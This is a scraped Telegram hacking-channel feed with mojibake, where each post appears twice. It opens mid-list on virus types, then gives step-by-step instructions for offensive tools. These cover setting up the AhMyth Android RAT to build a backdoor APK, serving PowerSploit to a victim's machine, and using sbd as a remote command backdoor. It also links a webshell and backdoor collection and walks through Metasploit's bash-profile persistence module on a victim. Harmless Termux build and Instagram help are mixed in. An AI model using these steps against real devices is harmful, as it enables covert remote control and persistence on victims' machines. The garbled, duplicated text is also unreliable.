This virus also infects executable files or programs. When you run these programs, the file infector virus is activated as well which can slow down the program and produce other damaging effects. A large block of existing viruses belongs to this category.
9) Encrypted Virus
This type of virus uses encrypted malicious codes which make antivirus software hard to detect them. They can only be detected when they decrypt themselves during replication. Although they donโt delete files or folders, they can badly affect PC performance.
10) Companion Virus
This is a type of virus that doesnโt survive without accompanying an existing file or folder. In order to carry out damages, the file or folder being accompanied by companion viruses should be opened or run. Some examples of companion viruses include Terrax.1069, Stator, and Asimov.1539.
11) Network Virus
Basically, this type of virus spreads out through Local Network Area (LAN) and through the internet. These viruses replicate through shared resources, including drives and folders. When network viruses enter a computer, they look for their potential prey. Dangerous network viruses include Nimda and SQLSlammer.
12) Nonresident Virus
Nonresident viruses replicate through modules. When the module is executed, it will select one or more files to infect.
Stealth Virus
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Android Remote Administration Tool A-RAT For Termux
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
2) cd AhMyth-Android-RAT/AhMyth-Server
3) npm start
OR
1) Download a binary from https://github.com/AhMyth/AhMyth-Android-RAT/releases
2) Java (to generate apk backdoor)
๐ฆFeatures:
> Server side : desktop application based on electron framework (control panel)
> Client side : android application (backdoor)
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Android Remote Administration Tool A-RAT For Termux
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
2) cd AhMyth-Android-RAT/AhMyth-Server
3) npm start
OR
1) Download a binary from https://github.com/AhMyth/AhMyth-Android-RAT/releases
2) Java (to generate apk backdoor)
๐ฆFeatures:
> Server side : desktop application based on electron framework (control panel)
> Client side : android application (backdoor)
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ How To Setup a transparent proxy to forward all TCP and DNS traffic through a SOCKS / SOCKS5 or HTTP(CONNECT) proxy using iptables -j REDIRECT target
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Termux/Linux
1) git clone https://github.com/n1nj4sec/pr0cks
2) cd pr0cks?
3) use the socks5 proxy of openssh (the option -D)
> ssh -D 1080 user@sshserver
4) then you can add some iptables rules :
> iptables -t nat -A OUTPUT ! -d <my_ssh_server_IP>/32 -o eth0 -p tcp -m tcp -j REDIRECT --to-ports 10080
> iptables -t nat -A OUTPUT -o eth0 -p udp -m udp --dport 53 -j REDIRECT --to-ports 1053
5) then start pr0cks :
6) python pr0cks.py --proxy SOCKS5:127.0.0.1:1080
7) All your TCP traffic and DNS traffic should now pass through the ssh server kinda like if you had setup a tun VPN through ssh but without admin rights on the server ! #help
8) python pr0cks.py -h
๐ฆFeatures:
> support UDP (with socks5)
> support proxy chaining
> set up a local transparent proxy compatible with socks4 socks5 and HTTP CONNECT proxies allowing to forward any TCP traffic transparently using iptables
> set up a local transparent DNS proxy translating UDP port 53 requests to TCP allowing DNS traffic to go through a proxy without UDP support (like ssh -D option)
> DNS caching mechanism to speed up the DNS resolutions through pr0cks
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ How To Setup a transparent proxy to forward all TCP and DNS traffic through a SOCKS / SOCKS5 or HTTP(CONNECT) proxy using iptables -j REDIRECT target
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Termux/Linux
1) git clone https://github.com/n1nj4sec/pr0cks
2) cd pr0cks?
3) use the socks5 proxy of openssh (the option -D)
> ssh -D 1080 user@sshserver
4) then you can add some iptables rules :
> iptables -t nat -A OUTPUT ! -d <my_ssh_server_IP>/32 -o eth0 -p tcp -m tcp -j REDIRECT --to-ports 10080
> iptables -t nat -A OUTPUT -o eth0 -p udp -m udp --dport 53 -j REDIRECT --to-ports 1053
5) then start pr0cks :
6) python pr0cks.py --proxy SOCKS5:127.0.0.1:1080
7) All your TCP traffic and DNS traffic should now pass through the ssh server kinda like if you had setup a tun VPN through ssh but without admin rights on the server ! #help
8) python pr0cks.py -h
๐ฆFeatures:
> support UDP (with socks5)
> support proxy chaining
> set up a local transparent proxy compatible with socks4 socks5 and HTTP CONNECT proxies allowing to forward any TCP traffic transparently using iptables
> set up a local transparent DNS proxy translating UDP port 53 requests to TCP allowing DNS traffic to go through a proxy without UDP support (like ssh -D option)
> DNS caching mechanism to speed up the DNS resolutions through pr0cks
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPowersploit tutorial:
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
This is a tool that is for Windows machines. It has PowerShell installed in victims machine. This tool helps the hacker to connect with the victimโs machine via PowerShell.
1) To open it, open the terminal on the left and type the following command to enter into the powersploit folder โ
> cd /usr/share/powersploit/
(in kali)
2) If you type โlsโ it will list all the powersploit tools that you can download and install in the victimโs machine after you have gained access. Most of them are name self-explained according to their names.
3) An easy way to download this tool on the victimโs machine is to create a web server, which powersploit tools allow to create easily using the following command โ
> python -m SimpleHTTPServer
4) After this,
> type: http://<Kali machine ip_address>:8000/
5)Choose Option
E N J O Y
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPowersploit tutorial:
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
This is a tool that is for Windows machines. It has PowerShell installed in victims machine. This tool helps the hacker to connect with the victimโs machine via PowerShell.
1) To open it, open the terminal on the left and type the following command to enter into the powersploit folder โ
> cd /usr/share/powersploit/
(in kali)
2) If you type โlsโ it will list all the powersploit tools that you can download and install in the victimโs machine after you have gained access. Most of them are name self-explained according to their names.
3) An easy way to download this tool on the victimโs machine is to create a web server, which powersploit tools allow to create easily using the following command โ
> python -m SimpleHTTPServer
4) After this,
> type: http://<Kali machine ip_address>:8000/
5)Choose Option
E N J O Y
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSbd kali Linux Tool:
> sbd is a tool similar to Netcat with some improuvements :
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
It is portable and can be used in Linux and Microsoft machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption> Basically, it helps to connect to a victimโs machine any time on a specific port and send commands remotely.
1) To open it, go to the terminal and type โsbd -l -p portโ for the server to accept connections
2) port 44 where the server will listen.
3) On the victimโs site, type โsbd IPofserver portโ. A connection will be established where we can send the remote commands.
In this case, it is โlocalhostโ since we have performed the test on the same machine
4) on the server you will see that a connection has occurred
That all!
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSbd kali Linux Tool:
> sbd is a tool similar to Netcat with some improuvements :
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
It is portable and can be used in Linux and Microsoft machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption> Basically, it helps to connect to a victimโs machine any time on a specific port and send commands remotely.
1) To open it, go to the terminal and type โsbd -l -p portโ for the server to accept connections
2) port 44 where the server will listen.
3) On the victimโs site, type โsbd IPofserver portโ. A connection will be established where we can send the remote commands.
In this case, it is โlocalhostโ since we have performed the test on the same machine
4) on the server you will see that a connection has occurred
That all!
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆManual Recommended Building packages On Termux:
Using Termux build environment
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> On-device usage
It is possible to use build environment directly on device without Docker image or VM setup. You need only to:
1) Clone the git repository:
> git clone https://github.com/termux/termux-packages
2) Execute setup script:
3) cd termux-packages
4) ./scripts/setup-termux.sh
5) Packages are built by executing
> ./build-package.sh -I package_name.
6) Note that option "-I" tells build-package.sh to download and install dependency packages automatically instead of building them which makes build a lot faster.
7) By default, with Termux build environment you can build only existing packages. If package is not exist in ./packages directory, then you will have to write its build.sh manually.
๐ฆThere no universal guide about building/porting packages in Termux, especially since Termux isn't a standard platform.
> Though you can follow some recommendations mentioned here:
8) Make sure that minimal set of build tools is installed:
> pkg install build-essential
9) After extracting package source code, check for files named like "README" or "INSTALL". They usually contain information about how to build a package.
10 ) Autotools based projects (have ./configure script in project's root) in most cases can be built with the following commands:
> ./configure --prefix=$PREFIX
> make && make install
It is highly recommended to check the accepted configuration options by executing ./configure --help.
In case of configuration failure, read the output printed on screen and check the file config.log (contains a lot of text, but all information about error's source exist in it).
11) CMake based projects (have CMakeLists in project's root) should be possible to build with:
> mkdir build
> cd build
> cmake -DCMAKE_INSTALL_PREFIX="${PREFIX}" ..
> make
> make install
12) Be careful when running make install as it will unconditionally write files to $PREFIX. Never execute any of build commands as root.
13) Note about "bug reports": if you trying to build custom package and it fails, do not submit bug reports regarding it.
@ Steaven(jk)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆManual Recommended Building packages On Termux:
Using Termux build environment
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> On-device usage
It is possible to use build environment directly on device without Docker image or VM setup. You need only to:
1) Clone the git repository:
> git clone https://github.com/termux/termux-packages
2) Execute setup script:
3) cd termux-packages
4) ./scripts/setup-termux.sh
5) Packages are built by executing
> ./build-package.sh -I package_name.
6) Note that option "-I" tells build-package.sh to download and install dependency packages automatically instead of building them which makes build a lot faster.
7) By default, with Termux build environment you can build only existing packages. If package is not exist in ./packages directory, then you will have to write its build.sh manually.
๐ฆThere no universal guide about building/porting packages in Termux, especially since Termux isn't a standard platform.
> Though you can follow some recommendations mentioned here:
8) Make sure that minimal set of build tools is installed:
> pkg install build-essential
9) After extracting package source code, check for files named like "README" or "INSTALL". They usually contain information about how to build a package.
10 ) Autotools based projects (have ./configure script in project's root) in most cases can be built with the following commands:
> ./configure --prefix=$PREFIX
> make && make install
It is highly recommended to check the accepted configuration options by executing ./configure --help.
In case of configuration failure, read the output printed on screen and check the file config.log (contains a lot of text, but all information about error's source exist in it).
11) CMake based projects (have CMakeLists in project's root) should be possible to build with:
> mkdir build
> cd build
> cmake -DCMAKE_INSTALL_PREFIX="${PREFIX}" ..
> make
> make install
12) Be careful when running make install as it will unconditionally write files to $PREFIX. Never execute any of build commands as root.
13) Note about "bug reports": if you trying to build custom package and it fails, do not submit bug reports regarding it.
@ Steaven(jk)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWebshell && Backdoor Collection For Termux & Any Linux Distro :
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) To get all at oNCE (laqrge file)
> git clone https://github.com/xl7dev/WebShell
2) cd WebShell
3) Direct download
Zip file:
> https://github.com/xl7dev/WebShell/zipball/master
tar.gz file :
> https://github.com/xl7dev/WebShell/tarball/master
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWebshell && Backdoor Collection For Termux & Any Linux Distro :
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) To get all at oNCE (laqrge file)
> git clone https://github.com/xl7dev/WebShell
2) cd WebShell
3) Direct download
Zip file:
> https://github.com/xl7dev/WebShell/zipball/master
tar.gz file :
> https://github.com/xl7dev/WebShell/tarball/master
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to fix Instagram issues with Facebook Permissions?
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> If you accidentally delete Instagram from your Facebook account, you wonโt be able to post from Instagram to Facebook. You can use these steps to re-connect Instagram and Facebook.
1) Delete Instagram and Facebook from your phone.
2) Go to your Facebook settings and remove Instagram permissions.
3) Install Instagram and Facebook, then connect them again.
4) If your pictures are showing on the newsfeed, Instagram and Facebook are aware of the issue and working on it.
5) If followers canโt see your Instagram posts on Facebook, you may have to change Facebook Instagram permissions.
6) In cases where you see an error that says โYour Instagram album is full-on Facebook,โ you can change the name of your Instagram album on Facebook and a new one will show up when you share with Facebook again.
@ Steaven(jk)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to fix Instagram issues with Facebook Permissions?
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> If you accidentally delete Instagram from your Facebook account, you wonโt be able to post from Instagram to Facebook. You can use these steps to re-connect Instagram and Facebook.
1) Delete Instagram and Facebook from your phone.
2) Go to your Facebook settings and remove Instagram permissions.
3) Install Instagram and Facebook, then connect them again.
4) If your pictures are showing on the newsfeed, Instagram and Facebook are aware of the issue and working on it.
5) If followers canโt see your Instagram posts on Facebook, you may have to change Facebook Instagram permissions.
6) In cases where you see an error that says โYour Instagram album is full-on Facebook,โ you can change the name of your Instagram album on Facebook and a new one will show up when you share with Facebook again.
@ Steaven(jk)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat is The new New module: Bash Profile Persistence In Metasploite (few days ago)
t.me/iOsDeveloppers
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
This module establishes persistence via the Linux Bash profile method.
This module makes two changes to the target system.
> First, the module writes a payload to a directory (/var/temp/ by default).
> Second, the module writes a payload execution trigger to the Bash profile (~/.bashrc by default).
The persistent payload is executed whenever the victim user opens a Bash terminal.
1) Start msfconsole
2) Get a Linux Meterpreter session
3) use exploit/linux/local/bash_profile_persistence
4) set SESSION [SESSION]
5) run
6) Start a Meterpreter handler
7) On victim, open a new Bash terminal; you should get a new session with the permissions of the exploited user account
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat is The new New module: Bash Profile Persistence In Metasploite (few days ago)
t.me/iOsDeveloppers
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
This module establishes persistence via the Linux Bash profile method.
This module makes two changes to the target system.
> First, the module writes a payload to a directory (/var/temp/ by default).
> Second, the module writes a payload execution trigger to the Bash profile (~/.bashrc by default).
The persistent payload is executed whenever the victim user opens a Bash terminal.
1) Start msfconsole
2) Get a Linux Meterpreter session
3) use exploit/linux/local/bash_profile_persistence
4) set SESSION [SESSION]
5) run
6) Start a Meterpreter handler
7) On victim, open a new Bash terminal; you should get a new session with the permissions of the exploited user account
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS